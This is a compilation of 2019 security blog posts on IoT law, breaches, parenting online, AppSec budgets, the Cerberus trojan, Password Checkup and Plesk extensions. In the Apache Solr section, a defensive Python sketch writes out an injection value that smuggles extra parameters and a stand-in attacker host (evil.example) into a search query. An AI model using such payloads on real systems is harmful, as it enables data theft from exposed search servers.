Another example is the California Internet of Things cybersecurity law that states: Starting on January 1st, 2020, any manufacturer of a device that connects “directly or indirectly” to the internet must equip it with “reasonable” security features, designed to prevent unauthorized access, modification, or information disclosure.

We expect more states and countries to form regulations around IoT security, since these devices’ lack of security may have a dramatic effect on industry, cities, and people’s lives. The top two regulations about to be released are the new EU Cybersecurity Act (based on ENISA and ETSI standards) and the NIST IoT cybersecurity framework.

The post IoT Security in 2019: Things You Need to Know appeared first on CyberDB.

Analytics 101

From today’s smart home applications to autonomous vehicles of the future, the efficiency of automated decision-making is becoming widely embraced. Sci-fi concepts such as “machine learning” and “artificial intelligence” have been realized; however, it is important to understand that these terms are not interchangeable but evolve in complexity and knowledge to drive better decisions.

Distinguishing Between Machine Learning, Deep Learning and Artificial Intelligence

Put simply, analytics is the scientific process of transforming data into insight for making better decisions. Within the world of cybersecurity, this definition can be expanded to mean the collection and interpretation of security event data from multiple sources, and in different formats for identifying threat characteristics.

Simple explanations for each are as follows:

  • Machine Learning: Automated analytics that learn over time, recognizing patterns in data.  Key for cybersecurity because of the volume and velocity of Big Data.
  • Deep Learning: Uses many layers of input and output nodes (similar to brain neurons), with the ability to learn.  Typically makes use of the automation of Machine Learning.
  • Artificial Intelligence: The most complex and intelligent analytical technology, as a self-learning system applying complex algorithms which mimic human-brain processes such as anticipation, decision making, reasoning, and problem solving.
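As a toy illustration of Machine Learning’s “recognizing patterns in data,” the sketch below learns the normal range of a metric (say, login attempts per hour) from history and flags values that deviate by more than three standard deviations. Real security analytics use far richer models; the threshold here is a common rule of thumb, not a product setting:

```python
import statistics

# Learn a baseline from historical observations, then flag outliers.
def fit(history: list) -> tuple:
    """Return (mean, standard deviation) of the historical values."""
    return statistics.mean(history), statistics.stdev(history)

def is_anomalous(value: float, mean: float, stdev: float, k: float = 3.0) -> bool:
    """Flag values more than k standard deviations from the learned mean."""
    return abs(value - mean) > k * stdev
```

The "learning" here is simply refitting the baseline as new data arrives, which is what lets a statistical detector adapt to an environment instead of relying on fixed signatures.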

Benefits of Analytics within Cybersecurity

Big Data, the term coined in October 1997, is ubiquitous in cybersecurity as the volume, velocity and veracity of threats continue to explode. Security teams are overwhelmed by the immense volume of intelligence they must sift through to protect their environments from cyber threats. Analytics expand the capabilities of humans by sifting through enormous quantities of data and presenting it as actionable intelligence.

While the technologies must be used strategically and can be applied differently depending upon the problem at hand, here are some scenarios where human-machine teaming of analysts and analytic technologies can make all the difference:

  • Identify hidden malware with Machine Learning: Machine Learning algorithms recognize patterns far more quickly than your average human. This pattern recognition can detect behaviors that cause security breaches, whether known or unknown, periodically “learning” to become smarter. Machine Learning can be descriptive, diagnostic, predictive, or prescriptive in its analytic assessments, but typically is diagnostic and/or predictive in nature.
  • Defend against new threats with Deep Learning: Complex and multi-dimensional, Deep Learning reflects similar multi-faceted security behaviors in its actual algorithms; if the situation is complex, the algorithm is likely to be complex. It can detect, protect, and correct old or new threats by learning what is reasonable within any environment and identifying outliers and unique relationships.  Deep Learning can be descriptive, diagnostic, predictive, and prescriptive as well.
  • Anticipate threats with Artificial Intelligence: Artificial Intelligence uses reason and logic to understand its ecosystem. Like a human brain, AI considers value judgements and outcomes in determining good or bad, right or wrong.  It utilizes a number of complex analytics, including Deep Learning and Natural Language Processing (NLP). While Machine Learning and Deep Learning can span descriptive to prescriptive analytics, AI is extremely good at the more mature analytics of predictive and prescriptive.

With any security solution, therefore, it is important to identify the use case and ask “what problem are you trying to solve” before selecting Machine Learning, Deep Learning, or Artificial Intelligence analytics. In fact, sometimes a combination of these approaches is required, as in many McAfee products, including McAfee Investigator. Human-machine teaming, along with a layered approach to security, can further help to detect, protect, and correct the most simple or complex of breaches, providing a complete solution for customers’ needs.

The post Analytics 101 appeared first on McAfee Blogs.

Digital Parenting: How to Keep the Peace with Your Kids Online

Simply by downloading the right combination of apps, parents can now track their child’s location 24/7, monitor their social conversations, and inject their thoughts into their lives in a split second. To a parent, that’s called safety. To kids, it’s considered maddening.

Kids are making it clear that parents armed with apps are overstepping their roles in many ways. And parents, concerned about online risks, are making it clear they aren’t about to let their kids run wild.

I recently watched the relationship of a mother and her 16-year-old daughter fall apart over the course of a year. When the daughter got her driver’s license (along with her first boyfriend), the mother started tracking her daughter’s location with the Life360 app to ease her mind. However, the more she tracked, the more the confrontations escalated. Eventually, the daughter, feeling penned in, waged a full-blown rebellion that is still going strong.

There’s no perfect way to parent, especially in the digital space. There are, however, a few ways that might help us drive our digital lanes more efficiently and keep the peace. But first, we may need to curb (or ‘chill out on’ as my kids put it) some annoying behaviors we may have picked up along the way.

Here are just a few ways to keep the peace and avoid colliding with your kids online:

Interact with care on their social media. It’s not personal. It’s human nature. Kids (tweens and teens) don’t want to hang out with their parents in public — that especially applies online. They also usually aren’t too crazy about you connecting with their friends online. And tagging your tween or teen in photos? Yeah, that’s taboo. Tip: If you need to comment on a photo (be it positive or negative) do it in person or with a direct message, not under the floodlights of social media. This is simply respecting your child’s social boundaries. 

Ask before you share pictures. Most parents think posting pictures of their kids online is a simple expression of love or pride, but to kids, it can be extremely embarrassing, and even an invasion of privacy. Tip: Be discerning about how much you post about your kids online and what you post. Junior may not think a baby picture of him potty training is so cute. Go the extra step and ask your child’s permission before posting a photo of them.

Keep tracking and monitoring in check. Just because you have the means to monitor your kids 24/7 doesn’t mean you should. It’s wise to know where your child goes online (and off), but when that action slips into a preoccupation, it can wreck a relationship (it’s also exhausting). The fact that some kids make poor digital choices doesn’t mean your child will. If your fears about the online world and assumptions about your child’s behavior have led you to obsessively track their location, monitor their conversations, and hover online, it may be time to re-engineer your approach. Tip: Put the relationship with your child first. Invest as much time into talking to your kids and spending one-on-one time with them as you do tracking them. Put conversation before control so that you can parent from confidence, rather than fear.

Avoid interfering in conflicts. Kids will be bullied, meet people who don’t like them and go through tough situations. Keeping kids safe online can be done with wise, respectful monitoring. However, that monitoring can slip into lawnmower parenting (mowing over any obstacle that gets in a child’s path) as described in this viral essay. Tip: Don’t block your child’s path to becoming a capable adult. Unless there’s a serious issue to your child’s health and safety, try to stay out of his or her online conflicts. Keep it on your radar but let it play out. Allow your child to deal with peers, feel pain, and find solutions. 

As parents, we’re all trying to find the balance between allowing kids to have their space online and still keeping them safe. Too much tracking can cause serious family strife, while too little can be inattentive in light of the risks. Parenting today is a difficult road that’s always a work in progress, so give yourself permission to keep learning and improving your process along the way.

The post Digital Parenting: How to Keep the Peace with Your Kids Online appeared first on McAfee Blogs.

Maths and tech specialists need Hippocratic oath, says academic

Exclusive: Hannah Fry says ethical pledge needed in tech fields that will shape future

Mathematicians, computer engineers and scientists in related fields should take a Hippocratic oath to protect the public from powerful new technologies under development in laboratories and tech firms, a leading researcher has said.

The ethical pledge would commit scientists to think deeply about the possible applications of their work and compel them to pursue only those that, at the least, do no harm to society.


Weekly Update 152

I made it out of Vegas! That was a rather intense 8 days and if I'm honest, returning to the relative tranquillity of Oslo has been lovely (not to mention the massive uptick in coffee quality). But just as the US to Europe jet lag passes, it's time to head back to Aus for a bit and go through the whole cycle again. And just on that, I've found that diet makes a hell of a difference in coping with this sort of thing:

This week it's almost all about commercial CAs and their increasingly bizarre behaviour. It's disappointing to see disinformation and privacy violations from any organisations, but when it's from the ones literally controlling trust on the web it's especially concerning. Maybe once they're no longer able to promote EV in the way they have been that will change, but I have a feeling we've got a bunch more crap to endure yet. See what you think about all that in this week's update:


References

  1. Reminder: If you're using the HIBP API to search for email addresses, get yourself onto V3 ASAP! (you've got 2 days until the old versions die)
  2. Chegg had 40M accounts breached, with unsalted MD5 password hashes! (it was April last year, now it's searchable in HIBP)
  3. Extended Validation Certificates are (Really, Really) Dead (I've been saying it for ages, but both Chrome and Firefox have really nailed it now)
  4. DigiCert is rejecting the proposal to reduce maximum certificate lifespans (uh, except for that post a few years ago when they thought it was a good idea...)
  5. Sectigo leaked the personal info of a do-gooder which resulted in him receiving a threatening letter (there's all kinds of things gone wrong here)
  6. Big thanks to strongDM for sponsoring my blog over the last week! (see why Splunk's CISO says "strongDM enables you to see what happens, replay & analyze incidents. You can't get that anywhere else")
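On the Chegg point above: the reason unsalted MD5 is so dangerous is that identical passwords hash identically, so a single precomputed lookup table cracks every reuse at once. A minimal sketch (the tiny table here stands in for the enormous precomputed tables attackers actually use):

```python
import hashlib

# Unsalted MD5: the same password always yields the same digest.
def md5_unsalted(password: str) -> str:
    return hashlib.md5(password.encode()).hexdigest()

# A toy stand-in for a precomputed "rainbow table" of common passwords.
lookup = {md5_unsalted(p): p for p in ["password", "123456", "qwerty"]}

# A hash as it would appear in a breach dump is reversed instantly.
leaked_hash = md5_unsalted("123456")
print(lookup.get(leaked_hash))  # → 123456
```

A per-user random salt defeats exactly this: it makes each stored hash unique even when the underlying passwords are the same.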

Key Ways to Make the Case for AppSec Budget

Security departments are juggling a multitude of security initiatives, and each is competing for a slice of one budget. How do you make the case that AppSec deserves a slice of that budget pie, or a bigger slice, or even to make the pie bigger? Here are a few key ways:

Find a compelling event

The most obvious compelling event, of course, is a breach, but there are other events that will compel executives to budget for application security. For instance, regulations could be a compelling event – if you have to comply with a security regulation (PCI, NY DFS cybersecurity regulations, etc.) or pay a fine, that’s an easy budget win. In addition, customers asking about the security of software could be a compelling event. IT buyers are increasingly asking about the security of software before purchasing. We recently conducted a survey of IT buyers with IDG, and 96 percent of respondents reported that they are more likely to consider doing business with a vendor or partner whose software has been independently verified as “secure.” Sales losing a deal because they couldn’t respond to a security audit would certainly be considered a compelling event.

Look to the future

A clear road map and plan for your AppSec program not only gives you more credibility, but also helps to “warm up” your investors to what you’re planning on doing in future years. Show the efficiencies and risk reduction your program will make in the future to highlight how upfront investment will lead to future results. For instance, an investment in developer training will make developers more self-sufficient and lessen the burden on security teams.

Benchmark

It can be powerful to illustrate where your organization’s security program sits relative to other organizations and your peers. If you're lagging, it’s a clear indication that further investment is needed. If you're leading, you can use that fact to prove your progress and make the case for more ambitious projects.

Veracode’s State of Software Security is a good benchmarking resource, as is the OpenSAMM framework. The State of Software Security report includes comparisons by industry, so you can point to the application security progress made by others within your own industry. In addition, OWASP’s Application Security Verification Standard (ASVS) can help organizations to classify applications into three different levels from low to high assurance. This helps firms to allocate security resources based on the software’s business importance or breach risk.

Know your audience

Speak the language of executives when making the case for more budget. For instance, telling the CFO, “we've reduced the number of SQL injections” won’t resonate. Rather than the number of SQL injections, talk about how the program will reduce the number of breaches by X percent, or how it will reduce the cost to fix vulnerabilities by X percent. Be mindful of your audience and frame your budgeting conversation accordingly.

Be visible and credible

The more credible you are, the better your chances of getting the budget you’re asking for. Clearly understand what you're going to do with the money, and how you're going to justify that spend. Prove that you understand how your organization works and that you will use the money effectively. Finally, tie application security to business priorities and initiatives, and be able to show a clear roadmap for your program.

In addition, be visible. It's important to promote success of your program. Present on the progress you’re making, run awareness sessions, or have visible dashboards.

Break down your budget (must, should, could)

You’ll have a range of priorities and things that you could be spending money on in your AppSec program. Give your budget stakeholder options. Start with what you must do – for instance, what you need to achieve for regulatory compliance. And then give them some wiggle room in the middle on projects that they should or could do. If you go in with a number in mind and don't get it, be ready to slice and dice your budget request.

Learn more

Get more details on these strategies and additional tips and advice on making the case for AppSec budget in our new guide, Building a Business Case for Expanding Your AppSec Program.

The Cerberus Banking Trojan: 3 Tips to Secure Your Financial Data

A new banking trojan has emerged and is going after users’ Android devices. Dubbed Cerberus, this remote access trojan allows a distant attacker to take over an infected Android device, giving the attacker the ability to conduct overlay attacks, gain SMS control, and harvest the victim’s contact list. What’s more, the author of the Cerberus malware has decided to rent out the banking trojan to other cybercriminals as a means to spread these attacks.

According to The Hacker News, the author claims that this malware was completely written from scratch and doesn’t reuse code from other existing banking trojans. Researchers who analyzed a sample of the Cerberus trojan found that it has a pretty common list of features, including the ability to take screenshots, hijack SMS messages, steal contact lists, steal account credentials, and more.

When an Android device becomes infected with the Cerberus trojan, the malware hides its icon from the application drawer. Then, it disguises itself as Flash Player Service to gain accessibility permission. If permission is granted, Cerberus will automatically register the compromised device to its command-and-control server, allowing the attacker to control the device remotely. To steal a victim’s credit card number or banking information, Cerberus launches remote screen overlay attacks. This type of attack displays an overlay on top of legitimate mobile banking apps and tricks users into entering their credentials onto a fake login screen. What’s more, Cerberus has already developed overlay attacks for a total of 30 unique targets and banking apps.

So, what can Android users do to secure their devices from the Cerberus banking trojan? Check out the following tips to help keep your financial data safe:

  • Be careful what you download. Cerberus malware relies on social engineering tactics to make its way onto a victim’s device. Therefore, think twice about what you download or even plug into your device.
  • Click with caution. Only click on links from trusted sources. If you receive an email or text message from an unknown sender asking you to click on a suspicious link, stay cautious and avoid interacting with the message altogether.
  • Use comprehensive security. Whether you’re using a mobile banking app on your phone or browsing the internet on your desktop, it’s important to safeguard all of your devices with an extra layer of security. Use robust security software like McAfee Total Protection so you can connect with confidence.

And, of course, stay on top of the latest consumer and mobile security threats by following me and @McAfee_Home on Twitter, listening to our podcast Hackable?, and ‘Liking’ us on Facebook.

The post The Cerberus Banking Trojan: 3 Tips to Secure Your Financial Data appeared first on McAfee Blogs.

How to Build Your 5G Preparedness Toolkit

5G has been nearly a decade in the making but has really dominated the mobile conversation in the last year or so. This isn’t surprising considering the potential benefits this new type of network will provide to organizations and users alike. However, just like with any new technological advancement, there are a lot of questions being asked and uncertainties being raised around accessibility, as well as cybersecurity. The introduction of this next-generation network could bring more avenues for potential cyberthreats, potentially increasing the likelihood of distributed denial-of-service (DDoS) attacks due to the sheer number of connected devices. However, as valid as these concerns may be, we may be getting a bit ahead of ourselves here. While 5G has gone from an idea to a reality in a short amount of time for a handful of cities, these advancements haven’t happened without a series of setbacks and speedbumps.

In April 2019, Verizon was the first to launch a next-generation network, with other cellular carriers following closely behind. While a technological milestone in and of itself, some 5G networks are only available in select cities, even limited to just specific parts of the city. Beyond the not-so-widespread availability of 5G, internet speeds of the network have performed at a multitude of levels depending on the cellular carrier. Even if users are located in a 5G-enabled area, if they are without a 5G-enabled phone they will not be able to access all the benefits the network provides. These three factors – user location, network limitations of certain wireless carriers, and availability of 5G-enabled smartphones – must align for users to take full advantage of this exciting innovation.

While there is still a lot of uncertainty surrounding the future of 5G, as well as what cyberthreats may emerge as a result of its rollout, there are a few things users can do to prepare for the transition. To get your cybersecurity priorities in order, take a look at our 5G preparedness toolkit to ensure you’re prepared when the nationwide roll-out happens:

  • Follow the news. Since the announcement of a 5G enabled network, stories surrounding the network’s development and updates have been at the forefront of the technology conversation. Be sure to read up on all the latest to ensure you are well-informed to make decisions about whether 5G is something you want to be a part of now or in the future.
  • Do your research. With new 5G-enabled smartphones about to hit the market, ensure you pick the right one for you, as well as one that aligns with your cybersecurity priorities. The right decision for you might be to keep your 4G-enabled phone while the kinks and vulnerabilities of 5G get worked out. Just be sure that you are fully informed before making the switch and that all of your devices are protected.
  • Be sure to change your IoT devices’ factory settings. 5G will enable more and more IoT products to come online, and most of these connected products aren’t necessarily designed to be “security first.” A device may be vulnerable as soon as the box is opened, and many cybercriminals know how to get into vulnerable IoT devices via default settings. By changing the factory settings, you can instantly upgrade your device’s security and ensure your home network is secure.
  • Add an extra layer of security. As mentioned, with 5G creating more avenues for potential cyberthreats, it is a good idea to invest in comprehensive mobile security to apply to all of your devices to stay secure while on-the-go or at home.

Interested in learning more about IoT and mobile security trends and information? Follow @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

The post How to Build Your 5G Preparedness Toolkit appeared first on McAfee Blogs.

New Research: Lessons from Password Checkup in action



Back in February, we announced the Password Checkup extension for Chrome to help keep all your online accounts safe from hijacking. The extension displays a warning whenever you sign in to a site using one of over 4 billion usernames and passwords that Google knows to be unsafe due to a third-party data breach. Since our launch, over 650,000 people have participated in our early experiment. In the first month alone, we scanned 21 million usernames and passwords and flagged over 316,000 as unsafe, or 1.5% of sign-ins scanned by the extension.
Today, we are sharing our most recent lessons from the launch and announcing an updated set of features for the Password Checkup extension. Our full research study, available here, will be presented this week as part of the USENIX Security Symposium.

Which accounts are most at risk?

Hijackers routinely attempt to sign in to sites across the web with every credential exposed by a third-party breach. If you use strong, unique passwords for all your accounts, this risk disappears. Based on anonymous telemetry reported by the Password Checkup extension, we found that users reused breached, unsafe credentials for some of their most sensitive financial, government, and email accounts. This risk was even more prevalent on shopping sites (where users may save credit card details), news, and entertainment sites.

In fact, outside the most popular web sites, users are 2.5X more likely to reuse vulnerable passwords, putting their accounts at risk of hijacking.
Anonymous telemetry reported by Password Checkup extension shows that users most often reuse vulnerable passwords on shopping, news, and entertainment sites.


Helping users re-secure their unsafe passwords

Our research shows that users opt to reset 26% of the unsafe passwords flagged by the Password Checkup extension. Even better, 60% of new passwords are secure against guessing attacks—meaning it would take an attacker over a hundred million guesses before identifying the new password.

Improving the Password Checkup extension

Today, we are also releasing two new features for the Password Checkup extension. The first is a direct feedback mechanism where users can inform us about any issues that they are facing via a quick comment box. The second gives users even more control over their data. It allows users to opt-out of the anonymous telemetry that the extension reports, including the number of lookups that surface an unsafe credential, whether an alert leads to a password change, and the domain involved for improving site coverage. By design, the Password Checkup extension ensures that Google never learns your username or password, regardless of whether you enable telemetry, but we still want to provide this option if users would prefer not to share this information.
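The privacy claim above rests on the client never sending anything the server could reverse into a password. One simplified way to get that property is the k-anonymity range query used by services such as Have I Been Pwned's Pwned Passwords (Password Checkup itself uses a stronger private-set-intersection protocol). A minimal sketch, with a made-up three-entry breach corpus:

```python
import hashlib

# Hypothetical breached-password corpus standing in for a real one.
BREACHED = {"123456", "password", "letmein"}

def sha1_hex(password):
    return hashlib.sha1(password.encode()).hexdigest().upper()

# "Server" side: given only a 5-character hash prefix, return the
# suffixes of all breached hashes sharing that prefix. The server
# never sees the full hash, let alone the password.
def server_range(prefix):
    return {sha1_hex(p)[5:] for p in BREACHED if sha1_hex(p).startswith(prefix)}

# "Client" side: send the prefix, compare suffixes locally.
def is_breached(password):
    digest = sha1_hex(password)
    return digest[5:] in server_range(digest[:5])

print(is_breached("123456"))                      # breached
print(is_breached("correct horse battery staple"))  # not in the corpus
```

Many candidate passwords share any given 5-character prefix, so the prefix alone tells the server very little about which password was checked.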


We're continuing to improve the Password Checkup extension and exploring ways to implement its technology into Google products. For help keeping all your online accounts safe from hijacking, you can install the Password Checkup extension here today.

Myki data release breached privacy laws and revealed travel histories, including of Victorian MP

Researchers able to identify MP Anthony Carbines’s travel history using tweets and Public Transport Victoria dataset

The three-year travel history of a Victorian politician could be identified after the state government released the supposedly “de-identified” data of more than 15m myki public transport users in a breach of privacy laws.

In July 2018, Public Transport Victoria (now the Department of Transport) released a dataset containing 1.8bn travel records for 15.1m myki public transport users for the period between June 2015 and June 2018.

Related: Major breach found in biometrics system used by banks, UK police and defence firms

See you about 05.24AM tomorrow at Rosanna to catch the first train to town. Well done all. Thanks for hanging in there. Massive construction effort. Single track gone. Two level crossings gone. The trains! The trains! The trains are coming! pic.twitter.com/kk2Cj3ey9T

Continue reading...

As Cyberattacks Increase, So Does the Price of Cybersecurity Professionals

Cyberattacks are on the rise, and companies are noticing. Everyone is in a scramble to avoid being the next corporation sweeping news headlines with the words “data breach” following. As a result, the demand for cybersecurity experts is skyrocketing, but there are a couple of problems. Not only are there not enough cybersecurity experts to fill those roles, but those experts who are out there are demanding a premium for their talents.

A recent Bloomberg article stated that in 2012, an enticing rate for a chief information security officer at a large company was $650,000. Fast forward to 2019, and the same role at the same company is going for $2.5 million. On top of that, the article points to data that shows there were more than 300,000 unfilled cybersecurity jobs over a 12-month period in the United States in 2017-2018. When looking to the future, Cybersecurity Ventures predicts that the number of unfilled positions will grow to about 3.5 million jobs.

So, the problem itself is double-pronged. Companies are recognizing that they need to address cybersecurity in some way, shape, or form, and are looking to bring in experts to help them out – but those experts come at a very high cost.

Alternatives to the salary game

Security champions

Hiring additional security professionals does not have to be the starting point for your company to take the leap into more secure software. One practical way to embed security into your organization, and get more from your existing security team, is to look for – and create – security champions on your development teams. Step one is finding a security-minded individual on your development team, and then giving them extra training, responsibilities, and perks to incentivize them to be that security liaison. Developers will be much more inclined to take security advice from someone who’s already familiar with their lingo and processes.

Ultimately, with a security champion, an organization can make up for a lack of security coverage or skills by empowering a member of the development team to act as a force multiplier who can pass on security best practices, answer questions, and raise security awareness.

For more information on security champions, check out this Veracode guide.

Outside partners

As organizations struggle to find the right people to step in and oversee their programs, another effective way to ensure you have your bases covered is by bringing in an outside partner. Having a solution that offers hands-on support, coaching for developers, and AppSec expertise can make a world of difference. We aren’t suggesting you replace your internal team with outside consultants; rather, that you free your team to focus on managing risk by taking these tasks off of their plates:

  • Addressing the blocking and tackling of onboarding
  • Application security program management
  • Reporting
  • Identifying and addressing barriers to success
  • Working with development teams to ensure they’re finding and remediating vulnerabilities

Learn more about the benefits of bringing in an outside partner in this blog.

Automation

While you try to find the balance between keeping your headcount low and covering all of your bases from a security standpoint, a fantastic way to tie your approach together lies in utilizing automated security solutions. You can remove the need for human intervention as much as possible, continue to enable your developers to test for flaws early and often, and integrate a solution that works in tandem with your current environment. Having security champions, automated solutions that are easy to work with, and a partner who can help your developers when they run into roadblocks are all effective ways to reduce your risk – and without breaking the bank.

Want to find out how Veracode can help you check off all of these boxes and more? Request a personalized demo of our platform today.

GRA Quantum Launches Comprehensive Security Services

Global cybersecurity firm GRA Quantum announces the launch of its comprehensive offering, Scalable Security Suite, providing solutions based on a combination of Managed Security Services and professional services, tailored to the specific needs of each client. Scalable Security Suite was created to give small to mid-sized organizations a running start when it comes to security, providing the same standard of security controls as large enterprises.

According to GRA Quantum’s President Tom Boyden, “Small and medium-sized firms are prime targets for cybercrime, but many don’t have the necessary resources or guidance to properly strengthen their security stance.  Our Scalable Security Suite is designed to help these organizations prioritize their greatest vulnerabilities and provide them a security solution that aligns with their business needs and evolves as these needs and the threat landscapes change.”

Managed Security Services (MSS), launched in December 2018, is the foundation of Scalable Security Suite. Through comprehensive security assessments, GRA Quantum experts identify vulnerabilities and provide recommendations for a custom combination of professional service offerings to best address these vulnerabilities. Professional services can be added to Managed Security Services to overcome vulnerabilities and build a more comprehensive, proactive security program.

Jen Greulich, GRA Quantum’s Director of Managed Security Services, has seen the need arise among current MSS clients for these supplemental services.  “Oftentimes, it becomes clear in a scoping call that clients’ needs extend beyond what we offer through MSS. Our new flexible offering allows us to work with the clients to develop a custom security solution for them that complements MSS — whether they need incident response or penetration testing services.”

Aligned with GRA Quantum’s mission, Scalable Security Suite goes beyond the ordinary cyber assessment to understand and remediate acute physical and human-centric vulnerabilities as well.

To learn more about Scalable Security Suite, visit us on our website or begin to build your cybersecurity strategy with The Complete Guide to Building a Cybersecurity Strategy from Scratch.

The post GRA Quantum Launches Comprehensive Security Services appeared first on GRA Quantum.

New Research: Apache Solr Parameter Injection

Apache Solr is an open source enterprise search platform, written in Java, from the Apache Lucene project. Its major features include full-text search, hit highlighting, faceted search, dynamic clustering, and document parsing. You treat it like a database: you run the server, create a collection, and send different types of data to it (such as text, XML documents, PDF documents, etc.). Solr automatically indexes this data and provides a fast, rich REST API to search it. The only protocol to talk to the server is HTTP, and yes, it's accessible without authentication by default, which makes it a perfect target for keen hackers.

In a new research paper, Veracode Security Researcher Michael Stepankin sheds light on this new type of vulnerability for web applications – Solr parameter injection – and explains how cyberattackers can achieve remote code execution through it. Whether the Solr instance is Internet-facing, behind a reverse proxy, or used only by internal web applications, the ability to modify Solr search parameters is a significant security risk. Further, in cases where only a web application that uses Solr is accessible, by exploiting 'Solr (local) Parameters Injection,' it is possible to at least modify or view all the data within the Solr cluster, or even exploit known vulnerabilities to achieve remote code execution.
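To make the injection concrete, here is a minimal sketch (hypothetical function names, not from the whitepaper) of how raw string concatenation lets user input smuggle extra Solr parameters such as `shards` into a query string, and how URL-encoding confines the input to `q`:

```python
from urllib.parse import quote, parse_qs

# Hypothetical search handler that concatenates raw user input into a
# Solr query string -- the exploitable pattern.
def build_solr_query_unsafe(user_input):
    return "q=" + user_input + "&rows=10"

# The fix: percent-encode the input so it stays inside the q parameter.
def build_solr_query_safe(user_input):
    return "q=" + quote(user_input, safe="") + "&rows=10"

# An attacker smuggles extra Solr parameters through the search box.
payload = "laptop&fl=password&shards=http://evil.example/solr"

unsafe = parse_qs(build_solr_query_unsafe(payload))
safe = parse_qs(build_solr_query_safe(payload))

print("shards" in unsafe)  # injected parameter reaches Solr
print("shards" in safe)    # encoding keeps it inside q
```

A real client would send these query strings to Solr's request handler; the point is that the fix belongs at the encoding layer, before the parameters ever reach Solr.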

Read the in-depth, technical whitepaper, “Apache Solr Injection,” on GitHub.

Major breach found in biometrics system used by banks, UK police and defence firms

Fingerprints, facial recognition and other personal information from Biostar 2 discovered on publicly accessible database

The fingerprints of over 1 million people, as well as facial recognition information, unencrypted usernames and passwords, and personal information of employees, were discovered on a publicly accessible database for a company used by the likes of the UK Metropolitan police, defence contractors and banks.

Suprema is the security company responsible for the web-based Biostar 2 biometrics lock system that allows centralised control for access to secure facilities like warehouses or office buildings. Biostar 2 uses fingerprints and facial recognition as part of its means of identifying people attempting to gain access to buildings.

Related: The Great Hack: the film that goes behind the scenes of the Facebook data scandal

Related: Chinese cyberhackers 'blurring line between state power and crime'

Continue reading...

How To Help Your Kids Manage Our ‘Culture of Likes’

As a mum of 4 sons, my biggest concern about the era of social media is the impact of the ‘like culture’ on our children’s mental health. The need to generate likes online has become a biological compulsion for many teens and let’s be honest – adults too! The rush of dopamine that surges through one’s body when a new like has been received can make this like culture understandably addictive.

 

Research Shows Likes Can Make You Feel As Good As Chocolate!

The reason why our offspring (and even us) just can’t give up social media is because it can make us feel just so damn good! In fact, the dopamine surges we get from the likes we collect can give us a true psychological high and create a reward loop that is almost impossible to break. Research published in Psychological Science, a journal of the Association for Psychological Science, shows the brain circuits that are activated by eating chocolate and winning money are also activated when teens see large numbers of ‘likes’ on their own photos or photos of peers in a social network.

Likes and Self Worth

Approval and validation by our peers have, unfortunately, always had an impact on our sense of self-worth. Before the era of social media, teens may have measured this approval by the number of invitations they received to parties or the number of cards they received on their birthday. But in the digital world of the 21st century, this is measured very publicly through the number of followers we have or the number of likes we receive on our posts.

But this is dangerous territory. Living our lives purely for the approval of others is a perilous game. If our self-worth is reliant on the amount of likes we receive then we are living very fragile existences.

Instagram’s Big Move

In recognition of the competition social media has become for many, Instagram has decided to trial hiding the likes tally on posts. Instagram believes this move, which is also being trialled in six other countries including Canada and New Zealand, will improve the well-being of users and allow them to focus more on ‘telling their story’ and less on their likes tally.

But the move has been met with criticism. Some believe Instagram is ‘mollycoddling’ the more fragile members of our community whilst others believe it is threatening the livelihood of ‘Insta influencers’ whose income is reliant on public displays of likes.

Does Instagram’s Move Really Address Our Likes Culture?

While I applaud Instagram for taking a step to address the wellbeing and mental health of users, I believe that it won’t be long before users simply find another method of social validation to replace our likes stats. Whether it’s follower numbers or the amount of comments or shares, many of us have been wired to view social media platforms like Instagram as a digital popularity contest so will adjust accordingly. Preparing our kids for the harshness of this competitive digital environment needs to be a priority for all parents.

What Can Parents Do?

Before your child joins social media, it is imperative that you do your prep work with your child. There are several things that need to be discussed:

  1. Your Kids Are So Much More Than Their Likes Tally

It is not uncommon for tweens and teens to judge their worth by the number of followers or likes they receive on their social media posts. Clearly, this is crazy, but it is a common trend. So, please discuss the irrationality of the likes culture and online popularity contest that has become a feature of almost all social media platforms. Make sure they understand that social media platforms play on the ‘reward loop’ that keeps us coming back for more. Likes on our posts and validating comments from our followers provide hits of dopamine that make it hard to step away. While many tweens and teens view likes as a measure of social acceptance, it is essential that you continue to tell them that this is not a true measure of a person.

  2. Encourage Off-Line Activities

Help your kids develop skills and relationships that are not dependent on screens. Fill their time with activities that build face-to-face friendships and develop their individual talents. Whether it’s sport, music, drama, volunteering or even a part time job – ensuring your child has a life away from screens is essential to creating balance.

  3. Education is Key

Teaching your kids to be cyber safe and good digital citizens will minimise the chances of them experiencing any issues online. Reminding them about the perils of oversharing online, the importance of proactively managing their digital reputation and the harsh reality of online predators will prepare them for the inevitable challenges they will have to navigate.

  4. Keep the Communication Channels Open – Always!

Ensuring your kids really understand that they can speak to you about ANYTHING that is worrying them online is one of the best digital parenting insurance policies available. If they do come to you with an issue, it is essential that you remain calm and do not threaten to disconnect them from their online life. Whether it’s cyberbullying, inappropriate texting or a leak of their personal information, working with them to troubleshoot and solve problems and challenges they face is a must for all digital parents.

Like many parents, I wish I could wave a magic wand and get rid of the competition the likes culture has created online for many of our teens. But that is not possible. So, instead let’s work with our kids to educate them about its futility and help them develop a genuine sense of self-worth that will buffer them from the harshness this likes culture has created.

Alex xx

The post How To Help Your Kids Manage Our ‘Culture of Likes’ appeared first on McAfee Blogs.

Top 6 Plesk Security Extensions You Should Consider for Website Security

As one of the most popular hosting platforms alongside cPanel, Plesk provides a variety of security extensions for its users. Each Plesk security extension boasts its own unique features, meant to fully protect your website, server, email, and network from potential threats.

Some extensions on Plesk require advanced system administration, so it’s important that you choose the right security tools based on your knowledge and experience — as not all security extensions are created equal. 

While Plesk offers a range of security tools such as malware scanners or ransomware protection software, this blog post will focus on security extensions that are available on Plesk that provide protection against web application attacks and DoS and DDoS attacks. 

These types of web threats directly affect web applications and can result in your websites going offline. In this case, customers and visitors are denied access to your information and commercial services, which will negatively impact your business’s bottom line.

Take a look below at some of the most popular security extensions available on Plesk and how they can help prevent web attacks as well as their potential shortcomings. 

BitNinja

BitNinja specializes in server security; its Plesk security extension is designed to effectively eliminate threats from your Linux servers. The extension is also meant to spare you from performing any configuration and spending long hours on troubleshooting.

Because BitNinja’s security extension is equipped with DoS mitigation and a WAF (web application firewall), it protects against both web application and DDoS attacks. Its DoS mitigation works on TCP-based protocols, but instead of permanently blocking the source IP, it “greylists” the attacker’s IP.
